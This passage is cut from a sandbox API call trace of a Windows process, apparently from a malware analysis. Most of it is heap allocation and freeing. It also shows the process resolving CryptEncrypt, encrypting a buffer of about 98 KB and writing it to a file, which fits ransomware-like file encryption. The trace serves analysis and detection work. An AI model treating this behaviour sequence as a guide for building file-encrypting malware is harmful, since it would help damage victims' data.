(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0208.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0208.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0208.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0208.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0208.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0208.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0208.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0208.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0208.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0208.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0208.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0208.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0208.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0208.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0208.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0208.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0208.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0208.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0208.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0208.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d7f18 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.632] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0208.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab3e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0208.634] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0208.634] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x17ec3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x17ec8) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0208.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0208.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.635] CharLowerBuffW (in: lpsz="byte[97992]", cchLength=0xb | out: lpsz="byte[97992]") returned 0xb [0208.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.637] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0208.637] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0208.637] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0208.637] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0208.638] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0208.638] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.638] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.638] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.638] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.638] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.638] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.638] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.638] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d7f18*, pdwDataLen=0x8cef60*=0x17ec3, dwBufLen=0x17ec8 | out: pbData=0x37d7f18*, pdwDataLen=0x8cef60*=0x17ec8) returned 1 [0208.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.643] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.643] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.643] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.643] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.643] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.643] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.643] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.643] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.643] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.643] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.643] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.643] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.643] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.644] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.644] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.644] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.644] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.644] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.644] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.644] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.658] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.658] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.658] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.660] WriteFile (in: hFile=0x524, lpBuffer=0x2ac6748*, nNumberOfBytesToWrite=0x17ec8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ac6748*, lpNumberOfBytesWritten=0x8cf5e4*=0x17ec8, lpOverlapped=0x0) returned 1 [0208.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0208.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0208.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0208.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0208.662] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0208.662] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0208.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.663] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0208.663] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.663] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.663] 